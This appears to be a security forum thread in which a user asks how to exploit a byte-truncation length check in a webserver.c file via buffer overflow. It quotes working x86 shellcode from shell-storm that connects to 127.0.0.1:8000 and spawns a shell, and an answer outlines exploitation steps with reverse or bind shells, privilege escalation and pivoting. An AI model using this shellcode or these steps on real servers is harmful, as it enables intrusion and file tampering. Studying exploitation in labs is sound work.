# Need to compromise web server with buffer overflow attack

Tags: security, buffer, overflow, buffer-overflow

I have a webserver.c file and I already know what the bug is. It lies in this section:

```
    int check_filename_length(byte len) {
      if (len < 100)
        return 1;
      return 0;
    }
```

It converts the length of the file that is being sent to the webserver into a byte, so things that are greater than 100 bytes can still be sent it as long as the last 8 bits are correctly specified.

I'm trying to create a file that will buffer overflow the webserver, which is hosted on a Ubuntu 32-bit machine with Intel architecture. I've been trying to get some tips on how to:

1. Figure out the return address to overwrite.
2. Write out shellcode that will open up a port and a shell that is bound to a port on my local machine.
3. Execute instructions on the remote webserver's shell to modify files.

Here is some sample shellcode (http://shell-storm.org/shellcode/files/shellcode-98.php) from shell_storm that I have been looking at but I'm not sure how I would perform the above tasks in question.

```
    char code[] = "\x31\xc0\x50\x50\xb0\x17\x50\xcd\x80"
           "\x50\x6a\x01\x6a\x02\xb0\x61\x50\xcd"
           "\x80\x89\xc2\x68\x7f\x00\x00\x01\x68"
           "\x00\x02\x1f\x40\x89\xe0\x6a\x10\x50"
           "\x52\x31\xc0\xb0\x62\x50\xcd\x80\xb1"
           "\x03\x31\xdb\x53\x52\xb0\x5a\x50\xcd"
           "\x80\x43\xe2\xf6\x31\xc0\x50\x68\x6e"
           "\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89"
           "\xe3\x53\x50\x54\x53\xb0\x3b\x50\xcd"
           "\x80\x31\xc0\x50\x50\xcd\x80";

    int main(int argc, char **argv) {

          /* used to get ip:port combo for pushes */
            char *ip_addr = "127.0.0.1"; // watch for addresses that create \x00 and others
            int port = 8000;
            struct sockaddr_in dest;

            printf("IP: %s\n", ip_addr);
            printf("PORT: %d\n", port);

            dest.sin_family = AF_INET;
            dest.sin_port=htons(port);
            dest.sin_addr.s_addr = inet_addr(ip_addr);

            printf("push 0x%x\t; host\n", dest.sin_addr.s_addr);
            printf("push 0x%x02AA\t; port\n", dest.sin_port);

            int (*func)();
            printf("Bytes: %d\n", sizeof(code));
            func = (int (*)()) code;
            (int)(*func)();
    }

    */
```

I'm not sure I completely understand this example above either, so any tips would be greatly greatly appreciated!

Comment: Try these videos, they may help: http://www.securitytube.net/groups?operation=view&groupId=4. Also my answer [here may help](http://stackoverflow.com/a/28740907/413180) use [Evan's Debugger](http://freecode.com/projects/edebugger) to see how memory has affected.

Answer (score 0):

**General Steps**

> 1. First your server has to be running and your server request should be executed by the vulnerable code
> 2. Your payload has 2 major parts: The "custom exploit code" and the code to be executed once control has been obtained (e.g. reverse shell, bind shell).
> 3. Once the payload has been processed, if you're using a bind shell exploit, a port will be opened in the same server where you can bind your shell / meterpreter etc. If you're using a reverse shell instead, the server will connect to a "specific computer" with a hard coded address.
> 4. Once you have shell access, you can do whatever you like (e.g. delete files, escalate privileges, pivot) depending on your user level

Of course, you need to compile your C source code and generate the payload. If you're attack is remote, you have to send a request to the server with the payload. Otherwise, you need to have access to the server first (user privileges / not root) then try to escalate privileges to root with your program by passing some exploit parameters to the vulnerable process.